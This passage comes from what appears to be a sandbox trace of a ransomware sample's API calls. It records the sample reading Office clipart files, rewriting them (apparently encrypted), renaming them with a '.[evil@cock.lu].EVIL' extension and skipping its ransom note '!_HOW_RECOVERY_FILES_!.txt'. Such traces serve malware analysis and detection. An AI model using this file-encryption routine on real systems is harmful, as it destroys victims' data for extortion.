lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3380, lpOverlapped=0x0) returned 1 [0150.568] CloseHandle (hObject=0x1a8) returned 1 [0150.568] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.568] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.568] __uncaught_exception () returned 0x84b1160800 [0150.568] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.569] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf.[evil@cock.lu].evil")) returned 1 [0150.569] ??_V@YAXPEAX@Z () returned 0x1 [0150.573] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF", dwFileAttributes=0x200) returned 0 [0150.573] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.573] wcsstr (_Str="J0195248.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.573] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 69 [0150.573] wcscmp (_String1="J0195248.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.573] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195248.WMF") returned 0x0 [0150.573] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 0x45 [0150.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.576] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ca4, lpOverlapped=0x0) returned 1 [0150.584] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.584] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.584] _errno () returned 0x84b1160840 [0150.584] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.584] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1cc0, lpOverlapped=0x0) returned 1 [0150.585] CloseHandle (hObject=0x1a8) returned 1 [0150.587] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.587] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.587] __uncaught_exception () returned 0x84b1160800 [0150.587] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.588] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf.[evil@cock.lu].evil")) returned 1 [0150.589] ??_V@YAXPEAX@Z () returned 0x1 [0150.592] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF", dwFileAttributes=0x200) returned 0 [0150.592] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.592] wcsstr (_Str="J0195254.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.592] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 69 [0150.592] wcscmp (_String1="J0195254.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.592] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195254.WMF") returned 0x0 [0150.592] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 0x45 [0150.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.595] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11b6, lpOverlapped=0x0) returned 1 [0150.603] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.603] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.603] _errno () returned 0x84b1160840 [0150.603] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.603] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11c0, lpOverlapped=0x0) returned 1 [0150.603] CloseHandle (hObject=0x1a8) returned 1 [0150.603] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.603] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.604] __uncaught_exception () returned 0x84b1160800 [0150.604] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.604] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf.[evil@cock.lu].evil")) returned 1 [0150.604] ??_V@YAXPEAX@Z () returned 0x1 [0150.607] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF", dwFileAttributes=0x200) returned 0 [0150.607] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.607] wcsstr (_Str="J0195260.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.607] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 69 [0150.607] wcscmp (_String1="J0195260.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.607] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195260.WMF") returned 0x0 [0150.607] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF") returned 0x45 [0150.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.609] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x207a, lpOverlapped=0x0) returned 1 [0150.616] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.616] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.616] _errno () returned 0x84b1160840 [0150.616] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.616] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2080, lpOverlapped=0x0) returned 1 [0150.617] CloseHandle (hObject=0x1a8) returned 1 [0150.617] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.617] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.617] __uncaught_exception () returned 0x84b1160800 [0150.617] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.617] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf.[evil@cock.lu].evil")) returned 1 [0150.618] ??_V@YAXPEAX@Z () returned 0x1 [0150.621] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF", dwFileAttributes=0x200) returned 0 [0150.621] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.621] wcsstr (_Str="J0195320.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.621] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 69 [0150.621] wcscmp (_String1="J0195320.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.621] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195320.WMF") returned 0x0 [0150.621] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF") returned 0x45 [0150.621] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.624] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x72f8, lpOverlapped=0x0) returned 1 [0150.631] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.631] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.631] _errno () returned 0x84b1160840 [0150.632] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.632] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7300, lpOverlapped=0x0) returned 1 [0150.632] CloseHandle (hObject=0x1a8) returned 1 [0150.632] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.632] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.632] __uncaught_exception () returned 0x84b1160800 [0150.632] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.632] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf.[evil@cock.lu].evil")) returned 1 [0150.633] ??_V@YAXPEAX@Z () returned 0x1 [0150.636] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF", dwFileAttributes=0x200) returned 0 [0150.636] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.636] wcsstr (_Str="J0195342.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.636] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 69 [0150.636] wcscmp (_String1="J0195342.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.636] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195342.WMF") returned 0x0 [0150.636] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF") returned 0x45 [0150.636] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.638] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5350, lpOverlapped=0x0) returned 1 [0150.645] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.645] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.645] _errno () returned 0x84b1160840 [0150.645] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.645] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5360, lpOverlapped=0x0) returned 1 [0150.647] CloseHandle (hObject=0x1a8) returned 1 [0150.647] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.647] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.647] __uncaught_exception () returned 0x84b1160800 [0150.647] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.648] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf.[evil@cock.lu].evil")) returned 1 [0150.648] ??_V@YAXPEAX@Z () returned 0x1 [0150.651] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF", dwFileAttributes=0x200) returned 0 [0150.651] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.651] wcsstr (_Str="J0195428.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.651] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 69 [0150.651] wcscmp (_String1="J0195428.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195428.WMF") returned 0x0 [0150.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF") returned 0x45 [0150.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.653] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x48be, lpOverlapped=0x0) returned 1 [0150.741] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.741] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.741] _errno () returned 0x84b1160840 [0150.741] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.741] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x48c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x48c0, lpOverlapped=0x0) returned 1 [0150.741] CloseHandle (hObject=0x1a8) returned 1 [0150.741] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.742] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.742] __uncaught_exception () returned 0x84b1160800 [0150.742] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.742] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf.[evil@cock.lu].evil")) returned 1 [0150.743] ??_V@YAXPEAX@Z () returned 0x1 [0150.747] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF", dwFileAttributes=0x200) returned 0 [0150.747] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.747] wcsstr (_Str="J0195772.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.747] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 69 [0150.747] wcscmp (_String1="J0195772.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.747] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195772.WMF") returned 0x0 [0150.747] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 0x45 [0150.747] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.749] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe60, lpOverlapped=0x0) returned 1 [0150.759] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.759] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.759] _errno () returned 0x84b1160840 [0150.759] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.759] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0150.759] CloseHandle (hObject=0x1a8) returned 1 [0150.759] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.759] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.760] __uncaught_exception () returned 0x84b1160800 [0150.760] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.760] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf.[evil@cock.lu].evil")) returned 1 [0150.761] ??_V@YAXPEAX@Z () returned 0x1 [0150.764] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF", dwFileAttributes=0x200) returned 0 [0150.765] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.765] wcsstr (_Str="J0195788.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.765] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 69 [0150.765] wcscmp (_String1="J0195788.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0195788.WMF") returned 0x0 [0150.765] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 0x45 [0150.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.767] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbbc, lpOverlapped=0x0) returned 1 [0150.776] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.777] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.777] _errno () returned 0x84b1160840 [0150.777] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.777] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbc0, lpOverlapped=0x0) returned 1 [0150.777] CloseHandle (hObject=0x1a8) returned 1 [0150.777] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.777] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.777] __uncaught_exception () returned 0x84b1160800 [0150.777] fclose (in: 